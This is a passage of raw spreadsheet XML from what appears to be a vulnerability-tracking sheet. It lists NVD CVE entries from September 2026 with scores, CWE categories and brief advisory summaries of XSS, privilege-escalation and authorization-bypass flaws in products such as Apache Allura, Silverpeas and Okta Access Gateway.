t="inlineStr" /><c r="M1781" s="5" t="inlineStr" /><c r="N1781" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1781" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1781" s="5" t="inlineStr" /><c r="Q1781" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1781" s="5" t="inlineStr"><is><t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.</t></is></c><c r="S1781" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76002</t></is></c></row><row r="1782"><c r="A1782" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1782" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1782" s="5" t="inlineStr"><is><t>CVE-2026-77654</t></is></c><c r="D1782" s="5" t="n"><v>6.1</v></c><c r="E1782" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1782" s="5" t="inlineStr"><is><t>security.vulnerabilities@algosec.com</t></is></c><c r="G1782" s="5" t="inlineStr" /><c r="H1782" s="5" t="n"><v>0.001</v></c><c r="I1782" s="5" t="inlineStr" /><c r="J1782" s="5" t="inlineStr" /><c r="K1782" s="5" t="inlineStr" /><c r="L1782" s="5" t="inlineStr" /><c r="M1782" s="5" t="inlineStr" /><c r="N1782" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1782" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1782" s="5" t="inlineStr" /><c r="Q1782" s="5" t="inlineStr"><is><t>CWE-266</t></is></c><c r="R1782" s="5" t="inlineStr"><is><t>Improper Privilege Management vulnerability in Horizon Security Analyzer (formerly AlgoSec Firewall Analyzer) on Linux, 64 bit allows Privilege Escalation and Parameter Injection.

A local user with access to the command line may escalate their privileges by abusing the parameters of a command that is approved in the sudoers file. 


This issue affects Horizon Security Analyzer : A33.10, A33.20 and A33.30.</t></is></c><c r="S1782" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77654</t></is></c></row><row r="1783"><c r="A1783" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1783" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1783" s="5" t="inlineStr"><is><t>CVE-2026-77818</t></is></c><c r="D1783" s="5" t="n"><v>6.1</v></c><c r="E1783" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1783" s="5" t="inlineStr"><is><t>iletisim@usom.gov.tr</t></is></c><c r="G1783" s="5" t="inlineStr" /><c r="H1783" s="5" t="n"><v>0.002</v></c><c r="I1783" s="5" t="inlineStr" /><c r="J1783" s="5" t="inlineStr" /><c r="K1783" s="5" t="inlineStr" /><c r="L1783" s="5" t="inlineStr" /><c r="M1783" s="5" t="inlineStr" /><c r="N1783" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1783" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1783" s="5" t="inlineStr" /><c r="Q1783" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1783" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Information and Document Automation Program allows Content Spoofing.

This issue affects Library Information and Document Automation Program: from v22.1 before v22.2.</t></is></c><c r="S1783" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77818</t></is></c></row><row r="1784"><c r="A1784" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1784" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1784" s="5" t="inlineStr"><is><t>CVE-2026-78738</t></is></c><c r="D1784" s="5" t="n"><v>6.1</v></c><c r="E1784" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1784" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1784" s="5" t="inlineStr" /><c r="H1784" s="5" t="n"><v>0.002</v></c><c r="I1784" s="5" t="inlineStr" /><c r="J1784" s="5" t="inlineStr" /><c r="K1784" s="5" t="inlineStr" /><c r="L1784" s="5" t="inlineStr" /><c r="M1784" s="5" t="inlineStr" /><c r="N1784" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1784" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1784" s="5" t="inlineStr" /><c r="Q1784" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1784" s="5" t="inlineStr"><is><t>Silverpeas Core 6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Document management file upload feature.</t></is></c><c r="S1784" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78738</t></is></c></row><row r="1785"><c r="A1785" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1785" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1785" s="5" t="inlineStr"><is><t>CVE-2026-78741</t></is></c><c r="D1785" s="5" t="n"><v>6.1</v></c><c r="E1785" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1785" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1785" s="5" t="inlineStr" /><c r="H1785" s="5" t="n"><v>0.002</v></c><c r="I1785" s="5" t="inlineStr" /><c r="J1785" s="5" t="inlineStr" /><c r="K1785" s="5" t="inlineStr" /><c r="L1785" s="5" t="inlineStr" /><c r="M1785" s="5" t="inlineStr" /><c r="N1785" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1785" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1785" s="5" t="inlineStr" /><c r="Q1785" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1785" s="5" t="inlineStr"><is><t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) in the wysiwyg-CKEditor image upload feature.</t></is></c><c r="S1785" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78741</t></is></c></row><row r="1786"><c r="A1786" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1786" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1786" s="5" t="inlineStr"><is><t>CVE-2026-78742</t></is></c><c r="D1786" s="5" t="n"><v>6.1</v></c><c r="E1786" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1786" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1786" s="5" t="inlineStr" /><c r="H1786" s="5" t="n"><v>0.002</v></c><c r="I1786" s="5" t="inlineStr" /><c r="J1786" s="5" t="inlineStr" /><c r="K1786" s="5" t="inlineStr" /><c r="L1786" s="5" t="inlineStr" /><c r="M1786" s="5" t="inlineStr" /><c r="N1786" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1786" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1786" s="5" t="inlineStr" /><c r="Q1786" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1786" s="5" t="inlineStr"><is><t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Multimedia library application introduction.</t></is></c><c r="S1786" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78742</t></is></c></row><row r="1787"><c r="A1787" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1787" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1787" s="5" t="inlineStr"><is><t>CVE-2026-80180</t></is></c><c r="D1787" s="5" t="n"><v>6.1</v></c><c r="E1787" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1787" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1787" s="5" t="inlineStr" /><c r="H1787" s="5" t="n"><v>0.002</v></c><c r="I1787" s="5" t="inlineStr" /><c r="J1787" s="5" t="inlineStr" /><c r="K1787" s="5" t="inlineStr" /><c r="L1787" s="5" t="inlineStr" /><c r="M1787" s="5" t="inlineStr" /><c r="N1787" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1787" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1787" s="5" t="inlineStr" /><c r="Q1787" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1787" s="5" t="inlineStr"><is><t>Stored XSS via markdown HTML processing in Apache Allura.



This issue affects Apache Allura: from through 1.20.0.



Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t></is></c><c r="S1787" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80180</t></is></c></row><row r="1788"><c r="A1788" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1788" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1788" s="5" t="inlineStr"><is><t>CVE-2026-80190</t></is></c><c r="D1788" s="5" t="n"><v>6.1</v></c><c r="E1788" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1788" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1788" s="5" t="inlineStr" /><c r="H1788" s="5" t="n"><v>0.002</v></c><c r="I1788" s="5" t="inlineStr" /><c r="J1788" s="5" t="inlineStr" /><c r="K1788" s="5" t="inlineStr" /><c r="L1788" s="5" t="inlineStr" /><c r="M1788" s="5" t="inlineStr" /><c r="N1788" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1788" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1788" s="5" t="inlineStr" /><c r="Q1788" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1788" s="5" t="inlineStr"><is><t>Apache Allura: stored XSS via SVN code repositories.  Git repositories are not known to be affected.  The vulnerability is likely mitigated via default CSP headers.



This issue affects Apache Allura: through 1.20.0.



Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t></is></c><c r="S1788" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80190</t></is></c></row><row r="1789"><c r="A1789" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1789" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1789" s="5" t="inlineStr"><is><t>CVE-2026-8447</t></is></c><c r="D1789" s="5" t="n"><v>6.1</v></c><c r="E1789" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1789" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1789" s="5" t="inlineStr" /><c r="H1789" s="5" t="n"><v>0.002</v></c><c r="I1789" s="5" t="inlineStr" /><c r="J1789" s="5" t="inlineStr" /><c r="K1789" s="5" t="inlineStr"><is><t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t></is></c><c r="L1789" s="5" t="inlineStr" /><c r="M1789" s="5" t="inlineStr" /><c r="N1789" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1789" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1789" s="5" t="inlineStr" /><c r="Q1789" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1789" s="5" t="inlineStr"><is><t>IBM Langflow OSS 1.0.0 through 1.11.2 suffer from a stored cross-site scripting vulnerability in the Playground chat interface.</t></is></c><c r="S1789" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-8447</t></is></c></row><row r="1790"><c r="A1790" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1790" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1790" s="5" t="inlineStr"><is><t>CVE-2026-85229</t></is></c><c r="D1790" s="5" t="n"><v>6.1</v></c><c r="E1790" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1790" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1790" s="5" t="inlineStr" /><c r="H1790" s="5" t="n"><v>0.002</v></c><c r="I1790" s="5" t="inlineStr" /><c r="J1790" s="5" t="inlineStr" /><c r="K1790" s="5" t="inlineStr" /><c r="L1790" s="5" t="inlineStr" /><c r="M1790" s="5" t="inlineStr" /><c r="N1790" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1790" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1790" s="5" t="inlineStr" /><c r="Q1790" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1790" s="5" t="inlineStr"><is><t>** UNSUPPORTED WHEN ASSIGNED ** Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Apache SkyWalking Booster UI.



This issue affects Apache SkyWalking UI : from 10.2.0 through 10.4.0.



Users are recommended to upgrade to Horizon UI 1.0.0, which fixes the issue.</t></is></c><c r="S1790" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85229</t></is></c></row><row r="1791"><c r="A1791" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1791" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1791" s="5" t="inlineStr"><is><t>CVE-2026-85484</t></is></c><c r="D1791" s="5" t="n"><v>6.1</v></c><c r="E1791" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1791" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1791" s="5" t="inlineStr" /><c r="H1791" s="5" t="n"><v>0.003</v></c><c r="I1791" s="5" t="inlineStr" /><c r="J1791" s="5" t="inlineStr" /><c r="K1791" s="5" t="inlineStr" /><c r="L1791" s="5" t="inlineStr" /><c r="M1791" s="5" t="inlineStr" /><c r="N1791" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1791" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1791" s="5" t="inlineStr" /><c r="Q1791" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1791" s="5" t="inlineStr"><is><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is></c><c r="S1791" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85484</t></is></c></row><row r="1792"><c r="A1792" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1792" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1792" s="5" t="inlineStr"><is><t>CVE-2026-85485</t></is></c><c r="D1792" s="5" t="n"><v>6.1</v></c><c r="E1792" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1792" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1792" s="5" t="inlineStr" /><c r="H1792" s="5" t="n"><v>0.002</v></c><c r="I1792" s="5" t="inlineStr" /><c r="J1792" s="5" t="inlineStr" /><c r="K1792" s="5" t="inlineStr" /><c r="L1792" s="5" t="inlineStr" /><c r="M1792" s="5" t="inlineStr" /><c r="N1792" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1792" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1792" s="5" t="inlineStr" /><c r="Q1792" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1792" s="5" t="inlineStr"><is><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is></c><c r="S1792" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85485</t></is></c></row><row r="1793"><c r="A1793" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1793" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1793" s="5" t="inlineStr"><is><t>CVE-2026-85630</t></is></c><c r="D1793" s="5" t="n"><v>6.1</v></c><c r="E1793" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1793" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1793" s="5" t="inlineStr" /><c r="H1793" s="5" t="n"><v>0.003</v></c><c r="I1793" s="5" t="inlineStr" /><c r="J1793" s="5" t="inlineStr" /><c r="K1793" s="5" t="inlineStr" /><c r="L1793" s="5" t="inlineStr" /><c r="M1793" s="5" t="inlineStr" /><c r="N1793" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1793" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1793" s="5" t="inlineStr" /><c r="Q1793" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1793" s="5" t="inlineStr"><is><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is></c><c r="S1793" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85630</t></is></c></row><row r="1794"><c r="A1794" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1794" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1794" s="5" t="inlineStr"><is><t>CVE-2026-86254</t></is></c><c r="D1794" s="5" t="n"><v>6.1</v></c><c r="E1794" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1794" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1794" s="5" t="inlineStr" /><c r="H1794" s="5" t="n"><v>0.002</v></c><c r="I1794" s="5" t="inlineStr" /><c r="J1794" s="5" t="inlineStr" /><c r="K1794" s="5" t="inlineStr" /><c r="L1794" s="5" t="inlineStr" /><c r="M1794" s="5" t="inlineStr" /><c r="N1794" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1794" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1794" s="5" t="inlineStr" /><c r="Q1794" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1794" s="5" t="inlineStr"><is><t>wger versions through master contain an incomplete authorization bypass in wger/core/views/user.py where three views retain the original gym-scope check using raw integer comparison instead of the is_same_gym() helper, allowing gym staff with gym=None to delete, deactivate, or activate any other user with gym=None. Attackers with gym.manage_gym permission and gym=None affiliation can permanently delete user accounts, lock users out via deactivation, or undo defensive deactivations by exploiting the None != None comparison edge case.</t></is></c><c r="S1794" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86254</t></is></c></row><row r="1795"><c r="A1795" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1795" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1795" s="5" t="inlineStr"><is><t>CVE-2026-17610</t></is></c><c r="D1795" s="5" t="n"><v>6</v></c><c r="E1795" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1795" s="5" t="inlineStr"><is><t>product-security@silabs.com</t></is></c><c r="G1795" s="5" t="inlineStr" /><c r="H1795" s="5" t="n"><v>0.002</v></c><c r="I1795" s="5" t="inlineStr" /><c r="J1795" s="5" t="inlineStr" /><c r="K1795" s="5" t="inlineStr" /><c r="L1795" s="5" t="inlineStr" /><c r="M1795" s="5" t="inlineStr" /><c r="N1795" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1795" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1795" s="5" t="inlineStr" /><c r="Q1795" s="5" t="inlineStr"><is><t>CWE-404</t></is></c><c r="R1795" s="5" t="inlineStr"><is><t>In SiSDK v2026.6.0 and earlier, high network traffic loads can cause a dropped ACK leading to a denial of service. This is only present for EFR32MG24 and EFR32MG26 devices running concurrent multiprotocol Zigbee and Thread.</t></is></c><c r="S1795" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-17610</t></is></c></row><row r="1796"><c r="A1796" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1796" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1796" s="5" t="inlineStr"><is><t>CVE-2026-56101</t></is></c><c r="D1796" s="5" t="n"><v>6</v></c><c r="E1796" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1796" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1796" s="5" t="inlineStr" /><c r="H1796" s="5" t="n"><v>0.004</v></c><c r="I1796" s="5" t="inlineStr" /><c r="J1796" s="5" t="inlineStr" /><c r="K1796" s="5" t="inlineStr" /><c r="L1796" s="5" t="inlineStr" /><c r="M1796" s="5" t="inlineStr" /><c r="N1796" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1796" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1796" s="5" t="inlineStr" /><c r="Q1796" s="5" t="inlineStr"><is><t>CWE-697</t></is></c><c r="R1796" s="5" t="inlineStr"><is><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is></c><c r="S1796" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56101</t></is></c></row><row r="1797"><c r="A1797" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1797" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1797" s="5" t="inlineStr"><is><t>CVE-2026-74994</t></is></c><c r="D1797" s="5" t="n"><v>6</v></c><c r="E1797" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1797" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1797" s="5" t="inlineStr" /><c r="H1797" s="5" t="n"><v>0.004</v></c><c r="I1797" s="5" t="inlineStr" /><c r="J1797" s="5" t="inlineStr" /><c r="K1797" s="5" t="inlineStr" /><c r="L1797" s="5" t="inlineStr" /><c r="M1797" s="5" t="inlineStr" /><c r="N1797" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1797" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1797" s="5" t="inlineStr" /><c r="Q1797" s="5" t="inlineStr"><is><t>CWE-1289, CWE-863</t></is></c><c r="R1797" s="5" t="inlineStr"><is><t>The mod_auth module in OTP's inets httpd server, when configured with dets or mnesia authentication backends and multiple directory configuration blocks, collapses all directory blocks into a single shared user/group namespace. A user added to one protected directory is accepted as valid for all other protected directories on the same server instance.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is></c><c r="S1797" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74994</t></is></c></row><row r="1798"><c r="A1798" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1798" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1798" s="5" t="inlineStr"><is><t>CVE-2026-77123</t></is></c><c r="D1798" s="5" t="n"><v>6</v></c><c r="E1798" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1798" s="5" t="inlineStr"><is><t>103e4ec9-0a87-450b-af77-479448ddef11</t></is></c><c r="G1798" s="5" t="inlineStr" /><c r="H1798" s="5" t="n"><v>0.003</v></c><c r="I1798" s="5" t="inlineStr" /><c r="J1798" s="5" t="inlineStr" /><c r="K1798" s="5" t="inlineStr" /><c r="L1798" s="5" t="inlineStr" /><c r="M1798" s="5" t="inlineStr" /><c r="N1798" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1798" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P1798" s="5" t="inlineStr" /><c r="Q1798" s="5" t="inlineStr"><is><t>CWE-201</t></is></c><c r="R1798" s="5" t="inlineStr"><is><t>Nexus Repository 3 contains a sensitive information disclosure vulnerability in the capability read API. An account holding the nexus:capabilities:read privilege can retrieve the plaintext shared secret configured on a webhook capability, which is intended to be masked from all API responses. This issue affects Nexus Repository 3 versions 3.2.0 through 3.95.x, and is fixed in version 3.96.0.</t></is></c><c r="S1798" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77123</t></is></c></row><row r="1799"><c r="A1799" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1799" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1799" s="5" t="inlineStr"><is><t>CVE-2026-78216</t></is></c><c r="D1799" s="5" t="n"><v>6</v></c><c r="E1799" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1799" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1799" s="5" t="inlineStr" /><c r="H1799" s="5" t="n"><v>0.002</v></c><c r="I1799" s="5" t="inlineStr" /><c r="J1799" s="5" t="inlineStr" /><c r="K1799" s="5" t="inlineStr" /><c r="L1799" s="5" t="inlineStr" /><c r="M1799" s="5" t="inlineStr" /><c r="N1799" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1799" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1799" s="5" t="inlineStr" /><c r="Q1799" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="R1799" s="5" t="inlineStr"><is><t>AshLua exposes Ash read actions to Lua scripts run through an eval action. A read call accepts an operation (list, min, max, first, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.

Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A script could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate instead of as a field. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The prior hardening only enforced the exposed-field allow-list (field visibility), which is a separate axis from per-actor field-policy authorization.

The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.

This issue affects ash_lua: from 0.1.0 before 0.2.2.</t></is></c><c r="S1799" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78216</t></is></c></row><row r="1800"><c r="A1800" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1800" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1800" s="5" t="inlineStr"><is><t>CVE-2026-78230</t></is></c><c r="D1800" s="5" t="n"><v>6</v></c><c r="E1800" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1800" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1800" s="5" t="inlineStr" /><c r="H1800" s="5" t="n"><v>0.002</v></c><c r="I1800" s="5" t="inlineStr" /><c r="J1800" s="5" t="inlineStr" /><c r="K1800" s="5" t="inlineStr" /><c r="L1800" s="5" t="inlineStr" /><c r="M1800" s="5" t="inlineStr" /><c r="N1800" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1800" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1800" s="5" t="inlineStr" /><c r="Q1800" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="R1800" s="5" t="inlineStr"><is><t>AshAi exposes Ash read actions to language-model tool calls. The read tool accepts an aggregate result type (min, max, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.

Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A tool caller could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate; min/max in particular return an actual field value. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The tool's existing check only required the field to be public, which is a separate axis from per-actor field-policy authorization.

The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.

This issue affects ash_ai: from 0.1.0 before 1.0.3.</t></is></c><c r="S1800" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78230</t></is></c></row><row r="1801"><c r="A1801" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1801" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1801" s="5" t="inlineStr"><is><t>CVE-2026-78552</t></is></c><c r="D1801" s="5" t="n"><v>6</v></c><c r="E1801" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1801" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1801" s="5" t="inlineStr" /><c r="H1801" s="5" t="n"><v>0.003</v></c><c r="I1801" s="5" t="inlineStr" /><c r="J1801" s="5" t="inlineStr"><is><t>nginx, okta</t></is></c><c r="K1801" s="5" t="inlineStr" /><c r="L1801" s="5" t="inlineStr" /><c r="M1801" s="5" t="inlineStr" /><c r="N1801" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1801" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1801" s="5" t="inlineStr" /><c r="Q1801" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R1801" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not apply its Lua directive restriction to the application-level custom configuration field. The field is interpolated directly into the nginx server block without inspection, resulting in execution of injected directives.</t></is></c><c r="S1801" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78552</t></is></c></row><row r="1802"><c r="A1802" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1802" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1802" s="5" t="inlineStr"><is><t>CVE-2026-78622</t></is></c><c r="D1802" s="5" t="n"><v>6</v></c><c r="E1802" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1802" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1802" s="5" t="inlineStr" /><c r="H1802" s="5" t="n"><v>0.001</v></c><c r="I1802" s="5" t="inlineStr" /><c r="J1802" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1802" s="5" t="inlineStr" /><c r="L1802" s="5" t="inlineStr" /><c 